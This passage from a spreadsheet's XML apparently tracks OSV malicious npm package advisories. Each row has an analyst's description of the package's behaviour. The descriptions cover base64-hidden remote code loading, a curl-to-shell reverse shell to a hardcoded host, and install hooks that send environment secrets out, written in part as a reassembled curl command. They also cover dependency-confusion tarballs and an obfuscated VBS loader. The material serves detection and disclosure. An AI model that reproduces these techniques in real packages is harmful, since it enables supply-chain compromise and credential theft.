The package is published as hardhat-spack but presents itself internally as a pino-like logger. Its main export is a middleware factory that spawns lib/caller.js as a detached child process. caller.js and lib/const.js define a fake process.env object whose DEV_API_KEY, DEV_SECRET_KEY, and DEV_SECRET_VALUE are base64 blobs; DEV_API_KEY decodes to https://iphub-encrypted.vercel.app/api/auth/f1f097d93c318c92f0c5. caller.js base64-decodes that URL, POSTs to it, and passes the response body to `new Function.constructor("require", s)` and invokes it with the real require, giving the fetched JavaScript full Node capabilities (filesystem, child_process, network). The request is retried up to five times and failures are swallowed. The destination host is disposable Vercel infrastructure unrelated to any declared purpose, the URL and credential-shaped values are concealed with base64, and the executed code is attacker-mutable at any time.
</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17560</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17561</t>
        </is>
      </c>
      <c r="D95" s="5" t="inlineStr"/>
      <c r="E95" s="5" t="inlineStr"/>
      <c r="F95" s="5" t="inlineStr"/>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr">
        <is>
          <t>npm:insomnia-plugin-api-lint-helper</t>
        </is>
      </c>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr"/>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f3572e41f2e2e83a3156c1b24bf8684c0149a508e45626e80c592657cfb475ba)
index.js, the package's main entry, runs at require() time with no user interaction. On load it spawns OS-native calculator processes via child_process.exec ('calc.exe' on Windows, 'open -a Calculator' on macOS, 'gnome-calculator' on Linux) to demonstrate arbitrary code execution; writes a marker file to the user's Desktop (INSOMNIA_RCE_PROOF.txt); and serializes the full process.env object with JSON.stringify and emits it to the console, disclosing any tokens, API keys, and other secrets present in the environment of the host process (typically Insomnia on a developer machine). The source comments self-identify the module as a proof-of-concept remote code execution payload targeting Insomnia's plugin loader. The arbitrary-exec, filesystem write outside the package directory, and bulk environment enumeration all fire unconditionally at load.
</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17561</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17562</t>
        </is>
      </c>
      <c r="D96" s="5" t="inlineStr"/>
      <c r="E96" s="5" t="inlineStr"/>
      <c r="F96" s="5" t="inlineStr"/>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr">
        <is>
          <t>npm:internallib_v923</t>
        </is>
      </c>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr"/>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2d02d4c28dbcb2db331a6da7dba2476e3b7daf4f4d53d51d76d79ad4732d28a4)
index.js exports a command() function that shells out via /bin/bash -c to curl a payload from reverse-shell.sh and pipe it to sh, yielding a reverse shell to the hardcoded callback host 10.0.72.151:443. Any consumer requiring the package and invoking the exported API triggers remote-fetched shell execution with full-host control by the operator of the hardcoded callback. The manifest also declares a single dependency internallib_v79 and the sibling check.js invokes require('internallib_v79').command(), indicating the same payload shape is distributed across a package family with dependency-confusion-style naming (internallib_v&lt;n&gt;).
</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17562</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17563</t>
        </is>
      </c>
      <c r="D97" s="5" t="inlineStr"/>
      <c r="E97" s="5" t="inlineStr"/>
      <c r="F97" s="5" t="inlineStr"/>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr">
        <is>
          <t>npm:risk-detection</t>
        </is>
      </c>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr"/>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4b74a904a25687bbc34ad321ea019c5083f9a3651457750ed36207a209798f77)
package.json declares a dependency `ltidisafe` whose source is an off-registry tarball URL (`https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.8.1.tgz`) rather than a semver range on the npm registry. The shipped `index.js` is an empty stub (`module.exports = {}`), so the manifest URL is the entire install-time surface. On `npm install`, npm fetches whatever bytes that URL returns — unpinned, no integrity hash, no registry publisher check — installs the resulting package, and runs any lifecycle scripts inside it. Whoever controls that bucket path controls code execution on the installer's machine.
</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17563</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17564</t>
        </is>
      </c>
      <c r="D98" s="5" t="inlineStr"/>
      <c r="E98" s="5" t="inlineStr"/>
      <c r="F98" s="5" t="inlineStr"/>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr">
        <is>
          <t>npm:tostpro</t>
        </is>
      </c>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr"/>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2b31f6e946441400814984e1285717f9b2ee7fe5dacb7f0433f89396648a6183)
The npm package tostpro@100.2.0 ships a preinstall lifecycle hook that invokes test.sh, which runs automatically on `npm install`. The script assembles the command `curl` and the data source `env` from single-letter shell variables (b=e, i=c, s=n, h=u, a=v, l=rl) and splits the destination into `dom=https://abbishal.` plus `tld=com`, reconstructing them at runtime as `$i$h$l -d "`$b$s$a`" $dom$tld/sh/poc`. Execution is gated by `if [ `date +%s` -gt 1791141300 ]` (a Unix timestamp corresponding to roughly 2026-10-04); once that deadline passes, the output of `env` — the installer's full process environment, which routinely contains CI tokens, cloud credentials, and API keys — is POSTed to https://abbishal.com/sh/poc. The README states "No network access. No data collection," directly contradicting the shipped behavior. The string-splitting obfuscation, time-bomb gate, and cover-story README together indicate deliberate evasion.
</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17564</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17565</t>
        </is>
      </c>
      <c r="D99" s="5" t="inlineStr"/>
      <c r="E99" s="5" t="inlineStr"/>
      <c r="F99" s="5" t="inlineStr"/>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr">
        <is>
          <t>npm:typesens</t>
        </is>
      </c>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr"/>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3ded39f31b2c2d4d73e0b576ab862c9ed90688153a43c359dae5b26854ad8738)
package.json declares postinstall `wscript.exe 4444.vbs`, which runs automatically on `npm install`. The shipped 4444.vbs (~765 KB) contains a multi-layer decryption chain (AES S-box, ChaCha20-IETF, SHA-256 constants XOR-masked with 0x5A5A5A5A) over ~665 base64 chunks, decodes a payload to %TEMP% as a.dat file, drops a PowerShell loader, and invokes powershell.exe to perform process hollowing on Windows. Function names in the VBS are randomized (PlatformProbeLVI, DeviceCatalogUBYQ, EndpointRegistryRFX) and the `CreateObject` target is XOR-decoded at runtime; a cover-story header labels the file as a 'Verdant Signals Corp Device Telemetry Aggregator'. The advertised library surface — src/index.js is a trivial zod-based email-domain check with no network I/O, and the README claims 'No installation scripts' and describes a 'booking-eligibility' utility — is a decoy contradicting the package.json `files` entry that ships 4444.vbs and the postinstall hook that runs it. The typosquat-shaped name (typesens) reinforces the lure framing.
</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17565</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17566</t>
        </is>
      </c>
      <c r="D100" s="5" t="inlineStr"/>
      <c r="E100" s="5" t="inlineStr"/>
      <c r="F100" s="5" t="inlineStr"/>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr">
        <is>
          <t>npm:unified-platform</t>
        </is>
      </c>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr"/>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f8d42d95f6d25be97f23633f7088e06ac7faf2bd7f4fbc20fa85b5be18c90f6b)
package.json declares a single dependency 'ltidisafe' sourced directly from the off-registry URL https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.8.2.tgz, with no registry version range and no integrity hash. On npm install, npm fetches and installs whatever bytes that URL currently serves, executing any lifecycle scripts contained inside the fetched tarball under the installer's account. The GCS bucket host is not tied to any declared publisher of this package, and the fetched content can be changed at any time without a corresponding package republish. The shipped index.js is an empty stub, so the manifest's off-registry fetch is the package's entire effect on the installer. The package name 'unified-platform' at the implausibly high version 99.9.1 is consistent with a dependency-confusion lure targeting an internal name.
</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17566</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T100"/>
  <conditionalFormatting sqref="E2:E1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10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2026-10-05T07:29:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-05T07:29:32Z</dcterms:modified>
</cp:coreProperties>
</file>